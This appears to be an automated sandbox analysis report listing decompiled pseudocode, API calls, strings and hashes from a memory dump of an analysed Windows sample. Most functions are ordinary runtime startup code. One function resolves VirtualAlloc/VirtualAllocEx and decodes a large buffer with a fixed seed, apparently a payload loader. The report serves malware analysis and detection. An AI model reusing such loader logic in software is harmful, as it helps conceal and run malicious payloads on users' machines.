						asm("int3");
						asm("int3");
						asm("int3");
						_t20 = _t15;
						E00E81210(_t15, _v16);
						 *_t20 = 0xe8419c;
						return _t20;
					} else {
						L2();
						_t17 = _t6;
						if(_t17 == 0) {
							return __imp___invalid_parameter_noinfo_noreturn();
						}
						_t4 = _t17 + 0x23; // 0x23
						_t13 = _t4 & 0xffffffe0;
						 *((intOrPtr*)(_t13 - 4)) = _t17;
						return _t13;
					}
				} else {
					if(__ecx != 0) {
						_push(__ecx); // executed
						__eax = E00E8235E(__edx); // executed
						__esp = __esp + 4;
						return __eax;
					} else {
						__eax = 0;
						return 0;
					}
				}
			}

0x00e82110
0x00e82116
0x00e822d0
0x00e822d0
0x00e822d5
0x00e811d3
0x00e811d6
0x00e811db
0x00e811e4
0x00e811e5
0x00e811ea
0x00e811eb
0x00e811ec
0x00e811ed
0x00e811ee
0x00e811ef
0x00e811f5
0x00e811f7
0x00e811fc
0x00e81205
0x00e822db
0x00e822dd
0x00e822e2
0x00e822e6
0x00e822f2
0x00e822f2
0x00e822e8
0x00e822eb
0x00e822ee
0x00e822f1
0x00e822f1
0x00e8211c
0x00e8211e
0x00e81240
0x00e81241
0x00e81246
0x00e81249
0x00e82124
0x00e82124
0x00e82126
0x00e82126
0x00e8211e

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26dc61b3368bf9108a71b52bf3392aff814a56062868abd0a3b1b5e22cb80fb4
Instruction ID: 72ff2dadec7f5ceb03abe5fca5531bf5a5fe39cb595b8c7bf9c38cf6f6717174
Opcode Fuzzy Hash: 26dc61b3368bf9108a71b52bf3392aff814a56062868abd0a3b1b5e22cb80fb4
Instruction Fuzzy Hash: 8CF0F0B12022029ACB18B760981699A76D8EF50365B402DBDF68EF61A0E730D95A8385

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E81730 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00E81730(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v32;
				char _v40;
				char _v56;
				char _v60;
				char _v80;
				char _v92;
				signed int _t16;
				intOrPtr* _t30;
				char* _t42;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				signed int _t56;
				signed int _t57;
				signed int _t59;
				intOrPtr* _t60;

				_t61 = __eflags;
				_t50 = __esi;
				_t46 = __edx;
				_t35 = __ebx;
				_t56 = _t57;
				_t59 = (_t57 & 0xfffffff8) - 0x5c;
				_t16 =  *0xe86004; // 0xffb5ab53
				_v8 = _t16 ^ _t59;
				_push(__esi);
				E00E81A20(__ebx,  &_v80, __edx, __esi, __eflags, "VirtualAlloc");
				E00E81A20(__ebx,  &_v60, __edx, _t50, __eflags, "VirtualAllocEx");
				E00E81A20(_t35,  &_v40, _t46, _t50, _t61, "kernel32.dll");
				_t51 = E00E81A00( &_v92);
				_t47 = 0;
				_t62 = _t51;
				if(_t51 != 0) {
					do {
						 *((char*)(_t47 + 0xecf210)) =  *((intOrPtr*)(E00E81A10(_t62, _t47)));
						_t47 = _t47 + 1;
					} while (_t47 < _t51);
				}
				_t52 = E00E81A00( &_v56);
				_t48 = 0;
				_t64 = _t52;
				if(_t52 != 0) {
					do {
						 *((char*)(_t48 + 0xecf2d0)) =  *((intOrPtr*)(E00E81A10(_t64, _t48)));
						_t48 = _t48 + 1;
					} while (_t48 < _t52);
				}
				_t41 =  &_v32;
				_t53 = E00E81A00( &_v32);
				_t49 = 0;
				_t66 = _t53;
				if(_t53 != 0) {
					do {
						_t41 =  &_v32;
						_t30 = E00E81A10(_t66, _t49);
						_t23 =  *_t30;
						 *((char*)(_t49 + 0xecf250)) =  *_t30;
						_t49 = _t49 + 1;
					} while (_t49 < _t53);
				}
				_t42 =  &_v92;
				E00E812A0(_t23, _t42, _t41);
				L11();
				 *0xecf2c8 = 0x1dcdad44;
				srand(0x1dcdad44);
				_t60 = _t59 + 4;
				_t54 = 0;
				do {
					_t15 = _t54 + 0xe86018; // 0xe86018
					L00E81980(_t56, _t15);
					_t54 = _t54 + 1;
					_t69 = _t54 - 0x48e01;
				} while (_t54 <= 0x48e01);
				E00E81720(_t69);
				exit(0);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t42);
				E00E81BA0(_t42,  *_t60);
				return _t42;
			}

0x00e81730
0x00e81730
0x00e81730
0x00e81730
0x00e81731
0x00e81736
0x00e81739
0x00e81740
0x00e81744
0x00e8174e
0x00e8175c
0x00e8176a
0x00e81778
0x00e8177a
0x00e8177c
0x00e8177e
0x00e81780
0x00e8178c
0x00e81792
0x00e81793
0x00e81780
0x00e817a0
0x00e817a2
0x00e817a4
0x00e817a6
0x00e817b0
0x00e817bc
0x00e817c2
0x00e817c3
0x00e817b0
0x00e817c7
0x00e817d0
0x00e817d2
0x00e817d4
0x00e817d6
0x00e817e0
0x00e817e1
0x00e817e5
0x00e817ea
0x00e817ec
0x00e817f2
0x00e817f3
0x00e817e0
0x00e817f8
0x00e817fc
0x00e81801
0x00e8180b
0x00e81815
0x00e8181b
0x00e8181e
0x00e81820
0x00e81820
0x00e81827
0x00e8182c
0x00e8182d
0x00e8182d
0x00e81835
0x00e8183c
0x00e81842
0x00e81843
0x00e81844
0x00e81845
0x00e81846
0x00e81847
0x00e81848
0x00e81849
0x00e8184a
0x00e8184b
0x00e8184c
0x00e8184d
0x00e8184e
0x00e8184f
0x00e81850
0x00e81854
0x00e8185c

APIs

srand.API-MS-WIN-CRT-UTILITY-L1-1-0(1DCDAD44,?,kernel32.dll,VirtualAllocEx,VirtualAlloc), ref: 00E81815
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00E86018), ref: 00E8183C

Strings

VirtualAlloc, xrefs: 00E81745
kernel32.dll, xrefs: 00E81761
VirtualAlloc, xrefs: 00E8178C
VirtualAllocEx, xrefs: 00E817BC
kernel32.dll, xrefs: 00E817EC
VirtualAllocEx, xrefs: 00E81753

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: exitsrand
String ID: VirtualAlloc$VirtualAlloc$VirtualAllocEx$VirtualAllocEx$kernel32.dll$kernel32.dll
API String ID: 2250616054-2390103768
Opcode ID: 6cab202bd1159e84b9245dd0ce690958ffe01df928ac6dacd3f7f22dc52d400b
Instruction ID: 604e16848b230fdb39dc7cb5e30f7c75cda04e1e2fe8194169ec4390c6bf0069
Opcode Fuzzy Hash: 6cab202bd1159e84b9245dd0ce690958ffe01df928ac6dacd3f7f22dc52d400b
Instruction Fuzzy Hash: DD21D5714052508FC309FB64CD829AEB7E9AF52B80F086AEDF04E77162DF31580B8796

Uniqueness

Uniqueness Score: -1.00%

Function 00E82BB6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00E82BB6(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				void _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				void* _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				void _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00E82DAE(_t34);
				 *_t60 = 0x2cc;
				_v632 = memset( &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				memset( &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00E82DAE(_t49);
				}
				return _t49;
			}

0x00e82bb6
0x00e82bb6
0x00e82bb6
0x00e82bca
0x00e82bcc
0x00e82bcf
0x00e82bcf
0x00e82bd3
0x00e82bd8
0x00e82bf0
0x00e82bf6
0x00e82bfc
0x00e82c02
0x00e82c08
0x00e82c0e
0x00e82c14
0x00e82c1b
0x00e82c22
0x00e82c29
0x00e82c30
0x00e82c37
0x00e82c3e
0x00e82c3f
0x00e82c48
0x00e82c4e
0x00e82c51
0x00e82c57
0x00e82c66
0x00e82c72
0x00e82c7d
0x00e82c84
0x00e82c8b
0x00e82c96
0x00e82c9e
0x00e82ca7
0x00e82ca9
0x00e82cac
0x00e82cae
0x00e82cb8
0x00e82cc0
0x00e82cc6
0x00000000
0x00e82ccd
0x00e82cd0

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E82BC2
memset.VCRUNTIME140(?,00000000,00000003), ref: 00E82BE8
memset.VCRUNTIME140(?,00000000,00000050), ref: 00E82C72
IsDebuggerPresent.KERNEL32 ref: 00E82C8E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E82CAE
UnhandledExceptionFilter.KERNEL32(?), ref: 00E82CB8

Strings

`V)wPd)w, xrefs: 00E82C8E

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID: `V)wPd)w
API String ID: 1045392073-2422856788
Opcode ID: 7db3cdc99613c0540c5fa1707af0e636a0397cbb7194b0521a5252a40fb46cb4
Instruction ID: dfe2eb2264c420eb0d030eff093a29a3dfb25379e295600426f2d90fe5c81a10
Opcode Fuzzy Hash: 7db3cdc99613c0540c5fa1707af0e636a0397cbb7194b0521a5252a40fb46cb4
Instruction Fuzzy Hash: 8D312BB5D012189BDB11EFA0D989BCDBBF8AF08300F1041A9E50DB7290EB715A88CF05

Uniqueness

Uniqueness Score: -1.00%

Function 00E82E39 Relevance: 6.0, APIs: 4, Instructions: 25
timethreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E82E39() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				GetSystemTimeAsFileTime( &_v16);
				_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
				_v8 = _v8 ^ GetCurrentThreadId();
				_v8 = _v8 ^ GetCurrentProcessId();
				QueryPerformanceCounter( &_v24);
				return _v20 ^ _v24.LowPart ^ _v8 ^  &_v8;
			}

0x00e82e3f
0x00e82e46
0x00e82e4b
0x00e82e57
0x00e82e60
0x00e82e69
0x00e82e70
0x00e82e85

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E82E4B
GetCurrentThreadId.KERNEL32 ref: 00E82E5A
GetCurrentProcessId.KERNEL32 ref: 00E82E63
QueryPerformanceCounter.KERNEL32(?), ref: 00E82E70

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 8ffb0957596ba439a97ef60ec9f47646dc2e9f89332eace44abecbe90f80e337
Instruction ID: 6cb382b7c56ec5c066727c8535253db51bfe8419cf99845c0e24476e5d7c62d0
Opcode Fuzzy Hash: 8ffb0957596ba439a97ef60ec9f47646dc2e9f89332eace44abecbe90f80e337
Instruction Fuzzy Hash: 45F05FB5C1020DEFCB00DBF5DA49A9EBBF8EF18205F6248959516F7150E738AB089B52

Uniqueness

Uniqueness Score: -1.00%

Function 00E829D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00E829D2(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0xecf1e4 =  *0xecf1e4 & 0x00000000;
				 *0xe8600c =  *0xe8600c | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0xecf1e8; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xecf1e8 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xe8600c; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xecf1e4 = 1;
					 *0xe8600c = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xecf1e4 = 2;
						 *0xe8600c = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xe8600c; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xecf1e4 = 3;
								 *0xe8600c = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xecf1e4 = 5;
									 *0xe8600c = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xe8600c =  *0xe8600c | 0x00000040;
										 *0xecf1e4 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0xecf1e8; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0xecf1e8 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00e829d2
0x00e829d5
0x00e829df
0x00e829f0
0x00e82ba2
0x00e82ba5
0x00e82ba5
0x00e829f6
0x00e829fc
0x00e82a01
0x00e82a05
0x00e82a09
0x00e82a0b
0x00e82a0d
0x00e82a10
0x00e82a15
0x00e82a1e
0x00e82a2f
0x00e82a3a
0x00e82a40
0x00e82a41
0x00e82a47
0x00e82a4a
0x00e82a54
0x00e82a57
0x00e82a5a
0x00e82a5d
0x00e82aa2
0x00e82aa2
0x00e82aa8
0x00e82aa8
0x00e82aad
0x00e82aae
0x00e82ab4
0x00e82ae6
0x00e82ab6
0x00e82ab8
0x00e82ab9
0x00e82abf
0x00e82ac2
0x00e82ac4
0x00e82ac7
0x00e82aca
0x00e82acd
0x00e82ad0
0x00e82ad9
0x00e82ade
0x00e82ade
0x00e82ad9
0x00e82ae9
0x00e82aee
0x00e82af1
0x00e82afb
0x00e82b06
0x00e82b0c
0x00e82b0f
0x00e82b19
0x00e82b24
0x00e82b30
0x00e82b33
0x00e82b36
0x00e82b41
0x00e82b46
0x00e82b48
0x00e82b4d
0x00e82b50
0x00e82b5a
0x00e82b62
0x00e82b67
0x00e82b71
0x00e82b7f
0x00e82b92
0x00e82b99
0x00e82b99
0x00e82b7f
0x00e82b62
0x00e82b46
0x00e82b24
0x00000000
0x00e82ba1
0x00e82a62
0x00e82a6c
0x00e82a91
0x00e82a97
0x00e82a9a
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E829E8

Strings

", xrefs: 00E82B3C, 00E82AE6, 00E82B89

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID: "
API String ID: 2325560087-357034475
Opcode ID: df3ba646284568238e40c818b8267c57b82c816c21304ffbd757fd2359d56c8f
Instruction ID: 488fbd96fd10b6421347467ba5068c6082fd9be211653b734806ab55461c5a8f
Opcode Fuzzy Hash: df3ba646284568238e40c818b8267c57b82c816c21304ffbd757fd2359d56c8f
Instruction Fuzzy Hash: 7D518CB1A12205CFDB28CF56D8857AEBBF1FB44314F14846AC509FB290D3759944CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E82610 Relevance: 12.1, APIs: 8, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00E82610(void* __ebx, intOrPtr __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr* _t2;
				void* _t3;
				void* _t9;
				void* _t18;
				intOrPtr _t28;

				_t25 = __edi;
				_t24 = __edx;
				_push(2);
				L00E83000();
				_push(E00E82ED1());
				L00E83024();
				_t2 = E00E82D07();
				L00E83042();
				 *_t2 = _t2;
				_t3 = E00E8243D(__ebx, __edx, __edi, 1);
				_pop(_t28);
				_t32 = _t3;
				if(_t3 == 0) {
					L8:
					E00E82BB6(_t24, _t25, _t28, 7);
					asm("int3");
					E00E82F13();
					__eflags = 0;
					return 0;
				} else {
					asm("fclex");
					E00E82F48();
					E00E825CA(_t32, E00E82F74);
					_t9 = E00E82BA6();
					_push(_t9);
					L00E82FD6();
					if(_t9 != 0) {
						goto L8;
					} else {
						E00E82ED7(_t9);
						if(E00E82F30() != 0) {
							_push(E00E82D07);
							L00E83006();
						}
						E00E82EE6(E00E8285B(E00E8285B(_t11)));
						_push(E00E82D07());
						L00E83036();
						if(E00E82EE3() != 0) {
							L00E82FDC();
						}
						E00E82D07();
						_t18 = E00E82D02();
						if(_t18 != 0) {
							goto L8;
						} else {
							return _t18;
						}
					}
				}
			}

0x00e82610
0x00e82610
0x00e82611
0x00e82613
0x00e8261d
0x00e8261e
0x00e82623
0x00e8262a
0x00e82631
0x00e82633
0x00e8263b
0x00e8263c
0x00e8263e
0x00e826b3
0x00e826b5
0x00e826ba
0x00e826bb
0x00e826c0
0x00e826c2
0x00e82640
0x00e82640
0x00e82642
0x00e8264c
0x00e82651
0x00e82656
0x00e82657
0x00e82660
0x00000000
0x00e82662
0x00e82662
0x00e8266e
0x00e82670
0x00e82675
0x00e8267a
0x00e82685
0x00e8268f
0x00e82690
0x00e8269d
0x00e8269f
0x00e8269f
0x00e826a4
0x00e826a9
0x00e826b0
0x00000000
0x00e826b2
0x00e826b2
0x00e826b2
0x00e826b0
0x00e82660

APIs

_set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002), ref: 00E82613
_set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00E8261E
__p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00E8262A
__RTC_Initialize.LIBCMT ref: 00E82642
_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00E82F74), ref: 00E82657

Part of subcall function 00E82ED7: InitializeSListHead.KERNEL32(00ECF1F0,00E82667), ref: 00E82EDC

__setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00002D07), ref: 00E82675
_configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00E82690
_initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E8269F

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
String ID:
API String ID: 1933938900-0
Opcode ID: 606e75e01f36335e43eb0a8eb88dd64c7f4ceff3adfc3dc86a80982933013c08
Instruction ID: b83179e16277998c385ce4b0c56e004b1789edaa54a9f8578595898e4030f667
Opcode Fuzzy Hash: 606e75e01f36335e43eb0a8eb88dd64c7f4ceff3adfc3dc86a80982933013c08
Instruction Fuzzy Hash: DD014F70A443122AED3637F05E07A1E0AD41F20B58F44385CBB0C7E1D3EE5AC9419372

Uniqueness

Uniqueness Score: -1.00%

Function 00E82D58 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00E82D58(void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr* _t6;
				intOrPtr* _t8;
				intOrPtr* _t11;

				_t8 = _a4;
				_t11 =  *_t8;
				if( *_t11 != 0xe06d7363 ||  *((intOrPtr*)(_t11 + 0x10)) != 3) {
					L6:
					return 0;
				} else {
					_t6 =  *((intOrPtr*)(_t11 + 0x14));
					if(_t6 == 0x19930520 || _t6 == 0x19930521 || _t6 == 0x19930522 || _t6 == 0x1994000) {
						L00E82FAC();
						 *_t6 = _t11;
						L00E82FB2();
						 *_t6 =  *((intOrPtr*)(_t8 + 4));
						L00E83048();
						asm("int3");
						 *0xecf1ec =  *0xecf1ec & 0x00000000;
						return _t6;
					} else {
						goto L6;
					}
				}
			}

0x00e82d5d
0x00e82d60
0x00e82d68
0x00e82d8f
0x00e82d94
0x00e82d70
0x00e82d70
0x00e82d78
0x00e82d97
0x00e82d9c
0x00e82da1
0x00e82da6
0x00e82da8
0x00e82dad
0x00e82dae
0x00e82db5
0x00000000
0x00000000
0x00000000
0x00e82d78

APIs

__current_exception.VCRUNTIME140 ref: 00E82D97
__current_exception_context.VCRUNTIME140 ref: 00E82DA1
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E82DA8

Strings

csm, xrefs: 00E82D62

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: d3c885f3b52beb47acdccea37eefbd90a0e5ade9118c219a20bc039a0049a28f
Instruction ID: f49d7965150dd85130694984c43a4708c28da1e9b1b163db276dc3f34334f747
Opcode Fuzzy Hash: d3c885f3b52beb47acdccea37eefbd90a0e5ade9118c219a20bc039a0049a28f
